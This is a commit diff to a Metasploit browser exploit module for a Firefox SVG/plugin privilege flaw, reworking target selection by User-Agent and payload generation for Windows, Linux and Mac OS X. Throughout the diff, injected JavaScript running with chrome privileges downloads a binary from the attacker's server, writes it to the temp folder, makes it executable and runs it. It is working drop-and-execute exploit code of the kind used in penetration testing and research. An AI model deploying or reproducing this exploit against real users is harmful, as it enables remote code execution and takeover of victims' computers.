Merge pull request #1 from wchen-r7/pr1856_target_fix

jvennix-r7 · jvennix-r7 · commit db90423faf93 · 2013-05-23T09:59:26.000-07:00
Fix rapid7#1856 - Target selection and swf path
diff --git a/modules/exploits/multi/browser/firefox_svg_plugin.rb b/modules/exploits/multi/browser/firefox_svg_plugin.rb
@@ -33,31 +33,39 @@ def initialize(info = {})
 				with script access should be able to trigger it.
 			},
 			'License'        => MSF_LICENSE,
-			'Targets'        => [
-				[ 'Windows x86 (Native Payload)',
-					{
-						'Platform' => 'win',
-						'Arch' => ARCH_X86
-					}
-				],
-				[ 'Linux x86 (Native Payload)',
-					{
-						'Platform' => 'linux',
-						'Arch' => ARCH_X86
-					}
+			'Targets'        =>
+				[
+					[ 'Automatic',
+						{
+							'Platform' => ['win', 'linux', 'osx'],
+							'Arch'     => ARCH_X86
+						}
+					],
+					[ 'Windows x86 (Native Payload)',
+						{
+							'Platform' => 'win',
+							'Arch' => ARCH_X86
+						}
+					],
+					[ 'Linux x86 (Native Payload)',
+						{
+							'Platform' => 'linux',
+							'Arch' => ARCH_X86
+						}
+					],
+					[ 'Mac OS X x86 (Native Payload)',
+						{
+							'Platform' => 'osx',
+							'Arch' => ARCH_X86,
+						}
+					]
 				],
-				[ 'Mac OS X x86 (Native Payload)',
-					{
-						'Platform' => 'osx',
-						'Arch' => ARCH_X86,
-					}
-				]
-			],
 			'DefaultTarget'  => 0,
 			'Author'         =>
 				[
 					'Marius Mlynski', # discovery & bug report
-					'joev'            # metasploit module
+					'joev',           # metasploit module
+					'sinn3r'          # metasploit fu
 				],
 			'References'     =>
 				[
@@ -78,49 +86,70 @@ def initialize(info = {})
 	end
 
 	def on_request_uri(cli, request)
-		if target != get_target(request.headers['User-Agent'])
-			print_status("User agent does not match an available payload type, bailing.")
+		my_target = get_target(request.headers['User-Agent'])
+		if my_target.nil?
+			print_error("User agent does not match an available payload type, bailing.")
 			send_not_found(cli)
 			return
 		end
 
+		target = my_target
+
 		if request.uri =~ /\.swf$/
 			# send Flash .swf for navigating the frame to chrome://
 			print_status("Sending .swf trigger.")
 			send_response(cli, flash_trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
 		elsif request.uri =~ /\.bin/
 			# send the binary payload to drop & exec
 			print_status("Child frame navigated. Sending binary payload to drop & execute.")
-			send_response(cli, dropped_file_contents(cli), { 'Content-Type' => 'application/octet-stream' })
+			send_response(cli, dropped_file_contents(cli, target), { 'Content-Type' => 'application/octet-stream' })
 		else
 			# send initial HTML page
+			print_status("Target selected: #{target.name}")
 			print_status("Sending #{self.name}")
-			send_response_html(cli, generate_html)
+			send_response_html(cli, generate_html(target))
 		end
 		handler(cli)
 	end
 
 	# @return [String] the encoded executable for dropping onto the client's machine
-	def dropped_file_contents(cli)
-		regenerate_payload(cli).encoded_exe()
+	def dropped_file_contents(cli, target)
+		return if ((p=regenerate_payload(cli)) == nil)
+		opts = target.opts
+		exe = ''
+
+		case target.name
+		when /windows/i
+			opts = opts.merge({:code=>p.encoded})
+			exe = generate_payload_exe(opts)
+		when /linux/i
+			exe = Msf::Util::EXE.to_linux_x86_elf(framework, p.encoded, opts)
+		when /os x/i
+			exe = Msf::Util::EXE.to_osx_x86_macho(framework, p.encoded, opts)
+		end
+
+		return exe
 	end
 
 	# @return [Msf::Module::Target] that matches the client's user-agent header
 	def get_target(agent)
-		# browser detection
+		# Not firefox, bail
 		if agent !~ /firefox/i
 			return nil
 		end
+
+		# User wants to manually specify a target, respect that
+		if target != targets[0]
+			return target
+		end
+
 		# os detection
 		if agent =~ /windows/i
-			print_status 'Windows detected.'
-			targets[0]
-		elsif agent =~ /linux/i
-			print_status 'Linux detected.'
 			targets[1]
-		elsif agent =~ /macintosh/i and agent =~ /intel/i
-			print_status 'OSX detected.'
+		elsif agent =~ /linux/i
 			targets[2]
+		elsif agent =~ /macintosh/i and agent =~ /intel/i
+			targets[3]
 		else
 			nil
 		end
@@ -133,16 +162,16 @@ def flash_trigger
 	end
 
 	# @return [String] the filename that will be used when the payload is dropped
-	def payload_filename
-		if target.name == 'Windows x86 (Native Payload)'
+	def payload_filename(target)
+		if target.name =~ /Windows x86/i
 			"#{Rex::Text.rand_text_alphanumeric(8)}.exe"
 		else
 			"#{Rex::Text.rand_text_alphanumeric(8)}.bin"
 		end
 	end
 
 	# @return [String] containing javascript code to execute with chrome privileges
-	def js_payload
+	def js_payload(target)
 		%Q|
 		#{js_debug("Injection successful. JS executing with chrome privileges.")}
 		var x = new XMLHttpRequest;
@@ -153,7 +182,7 @@ def js_payload
 		var file = Components.classes["@mozilla.org/file/directory_service;1"]
 		  .getService(Components.interfaces.nsIProperties)
 		  .get("TmpD", Components.interfaces.nsIFile);
-		file.append('#{payload_filename}');
+		file.append('#{payload_filename(target)}');
 		var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
 		  .createInstance(Components.interfaces.nsIFileOutputStream);
 		stream.init(file, 0x04 \| 0x08 \| 0x20, 0666, 0);
@@ -163,7 +192,7 @@ def js_payload
 		} else {
 			stream.close();
 		}
-		#{chmod_code}
+		#{chmod_code(target)}
 		#{js_debug("'Downloaded to: '+file.path", "")}
 		var process = Components.classes["@mozilla.org/process/util;1"]
 		                .createInstance(Components.interfaces.nsIProcess);
@@ -179,7 +208,7 @@ def js_debug(str, quote="'")
 	end
 
 	# @return [String] containing javascript that will chmod the dropped executable
-	def chmod_code
+	def chmod_code(target)
 		return '' if target.name == 'Windows x86 (Native Payload)'
 		%Q|
 			var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
@@ -194,15 +223,15 @@ def chmod_code
 	def base_url
 		proto = (datastore["SSL"] ? "https" : "http")
 		myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
-		"#{proto}://#{myhost}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
+		"#{proto}://#{myhost}:#{datastore['SRVPORT']}#{get_resource}"
 	end
 
 	# @return [String] HTML that is sent in the first response to the client
-	def generate_html
+	def generate_html(target)
 		vars = {
 			:symbol_id        => 'a',
 			:random_domain    => 'safe',
-			:payload          => js_payload,
+			:payload          => js_payload(target),
 			:payload_var      => 'c',
 			:payload_key      => 'k',
 			:payload_obj_var  => 'payload_obj',
